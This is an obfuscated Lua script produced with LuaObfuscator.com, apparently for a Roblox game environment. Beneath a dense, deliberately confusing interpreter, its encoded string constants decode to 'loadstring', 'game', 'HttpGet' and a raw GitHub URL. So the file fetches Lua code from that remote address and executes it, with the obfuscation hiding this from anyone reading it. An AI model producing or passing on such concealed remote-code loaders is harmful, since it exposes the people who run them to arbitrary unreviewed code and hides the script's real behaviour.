--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v112=v5(v88,v19);v19=nil;return v112;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((3 -1)^(v32-(2 -(1 -0)))))%(((1686 -(68 + 997)) -(555 + 64))^(((v33-((2202 -(226 + 1044)) -(857 + (322 -248)))) -(v32-(569 -(367 + 201)))) + 1)) ;return v90-(v90%(928 -(214 + 713))) ;end end else local v91=0 + 0 ;local v92;while true do if ((0 + 0)==v91) then v92=2^(v32-(878 -((399 -(32 + 85)) + 595))) ;return (((v31%(v92 + v92))>=v92) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=957 -(892 + 65) ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if ((0 + 0)==v34) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(351 -(87 + 263))) then return (v38 * (436 -(67 + 83 + 30))) + v37 ;end if (v36==(952 -((1799 -(915 + 82)) + 150))) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;v36=1 -0 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (3 -0) );v18=v18 + 4 ;v39=1188 -(1069 + 118) ;end if (v39==1) then return (v43 * (38062656 -(37819961 -16534521))) + (v42 * (143357 -77821)) + (v41 * (45 + 0 + 211)) + v40 ;end end end local function v24() local v44=791 -(368 + 423) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==((1432 -(630 + 793)) -6)) then if (v49==0) then if (v48==(18 -(10 + 8))) then return v50 * (0 -0) ;else v49=1;v47=442 -(416 + 26) ;end elseif (v49==2047) then return ((v48==(0 -0)) and (v50 * ((1 + 0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-((4950 -3489) -(145 + 293)) ) * (v47 + (v48/((432 -(44 + (1827 -1441)))^(1538 -(998 + 488))))) ;end if (v44==(0 + 0 + 0)) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==(774 -(201 + 571))) then v49=v20(v46,1159 -(116 + 1022) ,128 -97 );v50=((v20(v46,19 + 13 )==(3 -2)) and  -(3 -2)) or (860 -(814 + 45)) ;v44=3;end if (v44==(2 -1)) then v47=1 + 0 ;v48=(v20(v46,(3 -2) + 0 ,(2652 -(760 + 987)) -(261 + 624) ) * ((3 -1)^(1112 -(1020 + 60)))) + v45 ;v44=2;end end end local function v25(v51) local v52=1913 -(1789 + 124) ;local v53;local v54;while true do if (v52==((2586 -(1703 + 114)) -(745 + 21))) then return v6(v54);end if (v52==(1 + 1)) then v54={};for v113=4 -3 , #v53 do v54[v113]=v2(v1(v3(v53,v113,v113)));end v52=7 -4 ;end if (v52==(0 -0)) then v53=nil;if  not v51 then v51=v23();if (v51==(0 -0)) then return "";end end v52=1414 -(447 + 966) ;end if (v52==(1 + 0)) then v53=v3(v16,v18,(v18 + v51) -((702 -(376 + 325)) + 0) );v18=v18 + v51 ;v52=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0;end)();local v94=(function() return;end)();local v96=(function() return;end)();while true do if (v93==(0 -0)) then local v119=(function() return 0 -0 ;end)();local v120=(function() return;end)();while true do if ((1700 -(1419 + 281))~=v119) then else v120=(function() return 0;end)();while true do if (v120~=1) then else v93=(function() return  #"[";end)();break;end if (v120==0) then v94=(function() return v95();end)();v96=(function() return nil;end)();v120=(function() return 1;end)();end end break;end end end if (v93== #"[") then if (v94== #"{") then v96=(function() return v95()~=0 ;end)();elseif (v94==2) then v96=(function() return v97();end)();elseif (v94== #"nil") then v96=(function() return v98();end)();end v99[v100]=(function() return v96;end)();break;end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v56=(function() return function(v101,v102,v103) local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();while true do if (v104~=0) then else v105=(function() return 74 -(71 + 3) ;end)();while true do if ((0 + 0)==v105) then local v127=(function() return 0 -0 ;end)();local v128=(function() return;end)();while true do if (v127==0) then v128=(function() return 0 -0 ;end)();while true do if (v128~=(241 -(187 + 54))) then else v101[v102-#"}" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #" ",v61 do FlatIdent_8F047,Type,v21,Cons,v24,v25,v62,v70=(function() return v55(FlatIdent_8F047,Type,v21,Cons,v24,v25,v62,v70);end)();end v60[ #"91("]=(function() return v21();end)();for v71= #"}",v23() do local v72=(function() return v21();end)();if (v20(v72, #".", #",")==(0 + 0)) then local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==2) then if (v20(v110, #"[", #"<")== #".") then v111[2 + 0 ]=(function() return v62[v111[2]];end)();end if (v20(v110,2,2)~= #".") then else v111[ #"xnx"]=(function() return v62[v111[ #"-19"]];end)();end v108=(function() return 3;end)();end if (v108~=(6 -3)) then else if (v20(v110, #"xxx", #"gha")== #".") then v111[ #"http"]=(function() return v62[v111[ #"asd1"]];end)();end v57[v71]=(function() return v111;end)();break;end if (v108~=(1 -0)) then else local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if ((0 + 0)==v125) then v126=(function() return 0;end)();while true do if ((1637 -(1373 + 263))==v126) then v108=(function() return 1002 -(451 + 549) ;end)();break;end if (v126~=(0 + 0)) then else v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==0) then local v165=(function() return 0;end)();local v166=(function() return;end)();while true do if (v165==0) then v166=(function() return 0;end)();while true do if (v166==(0 -0)) then v111[ #"gha"]=(function() return v22();end)();v111[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v109== #"/") then v111[ #"91("]=(function() return v23();end)();elseif (v109==2) then v111[ #"gha"]=(function() return v23() -((2 -0)^(1400 -(746 + 638))) ;end)();elseif (v109== #"91(") then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179~=(0 + 0)) then else v180=(function() return 0 -0 ;end)();while true do if (v180==0) then v111[ #"-19"]=(function() return v23() -(2^16) ;end)();v111[ #".com"]=(function() return v22();end)();break;end end break;end end end v126=(function() return 342 -(218 + 123) ;end)();end end break;end end end if (v108==0) then v109=(function() return v20(v72,1583 -(1535 + 46) , #"xnx");end)();v110=(function() return v20(v72, #".com",6);end)();v108=(function() return 1 + 0 ;end)();end end end end for v73= #"/",v23() do v58,v73,v28=(function() return v56(v58,v73,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[(1 -0) + 0 ];local v68=v64[562 -(306 + 254) ];local v69=v64[3];return function(...) local v74=v67;local v75=v68;local v76=v69;local v77=v27;local v78=1;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -((2450 -(18 + 964)) -(899 + 568)) ;local v83={};local v84={};for v106=0 + 0 ,v82 do if ((3912==3912) and ((v106>=v76) or (3275==1804))) then v80[v106-v76 ]=v81[v106 + (2 -(3 -2)) ];else v84[v106]=v81[v106 + 1 ];end end local v85=(v82-v76) + (604 -(268 + (400 -(30 + 35)))) ;local v86;local v87;while true do local v107=0;while true do if (v107==(290 -(60 + 159 + 71))) then v86=v74[v78];v87=v86[573 -((1683 -(1043 + 214)) + 146) ];v107=1 + 0 ;end if ((v107==(1457 -(282 + 1174))) or (1417>3629)) then if (v87<=7) then if (v87<=(814 -(569 + 242))) then if (v87<=(2 -1)) then if ((2821<=4824) and (v87==(0 + 0 + 0))) then local v132=v86[1026 -(706 + 318) ];local v133,v134=v77(v84[v132](v13(v84,v132 + (1252 -(721 + 530)) ,v86[3])));v79=(v134 + v132) -(1 + 0) ;local v135=1271 -(945 + 326) ;for v167=v132,v79 do v135=v135 + ((7 -5) -1) ;v84[v167]=v133[v135];end else local v136=v86[2 + 0 ];local v137=v84[v86[703 -(271 + 429) ]];v84[v136 + 1 + 0 ]=v137;v84[v136]=v137[v86[1504 -(1408 + 92) ]];end elseif (v87==(1088 -(461 + 625))) then v84[v86[1290 -(993 + 295) ]]={};else local v142=v86[2];v84[v142]=v84[v142](v13(v84,v142 + 1 + 0 ,v79));end elseif (v87<=(1176 -((1268 -(20 + 830)) + 753))) then if ((1738<=2195) and (v87==(2 + 2))) then local v144=0 + 0 ;local v145;while true do if ((41<=3018) and (v144==(0 + 0))) then v145=v86[1 + 1 ];v84[v145]=v84[v145](v13(v84,v145 + (530 -(406 + 123)) ,v79));break;end end else v84[v86[1771 -(1366 + 383 + 20) ]]=v86[1 + 2 ];end elseif (v87==((2540 -(323 + 889)) -(1249 + 73))) then local v148=v86[(127 -(116 + 10)) + (2 -1) ];local v149,v150=v77(v84[v148](v13(v84,v148 + (1146 -(466 + 679)) ,v86[6 -3 ])));v79=(v150 + v148) -1 ;local v151=0 -0 ;for v170=v148,v79 do v151=v151 + ((141 + 1760) -(106 + 1794)) ;v84[v170]=v149[v151];end else v84[v86[2]]=v66[v86[1 + 2 ]];end elseif (v87<=(749 -(542 + 196))) then if ((2145<=4104) and (v87<=(3 + 6))) then if ((4795>402) and (v87>(23 -15))) then do return;end else v84[v86[5 -3 ]]={};end elseif ((2689<4845) and (v87==(590 -(361 + 219)))) then v84[v86[116 -(4 + (235 -125)) ]]=v86[(907 -(53 + 267)) -(17 + 40 + 527) ];else v84[v86[1429 -(41 + 1386) ]]();end elseif (v87<=(116 -(17 + 86))) then if ((4813>3565) and (v87>(3 + 6 + 3))) then v84[v86[(2 + 1) -1 ]]=v66[v86[8 -5 ]];else local v159=v86[168 -(122 + 44) ];local v160=v84[v86[3]];v84[v159 + ((414 -(15 + 398)) -0) ]=v160;v84[v159]=v160[v86[12 -8 ]];end elseif (v87==(12 + 1 + 1)) then v84[v86[1 + 1 ]]();else do return;end end v78=v78 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B69657462612F4B69657462612F726566732F68656164732F6D61696E2F796F752E6C756100094Q00087Q00120D000100013Q00120D000200023Q00200C000200020003001205000400046Q000200044Q000400013Q00022Q000E0001000100012Q000F3Q00017Q00",v9(),...);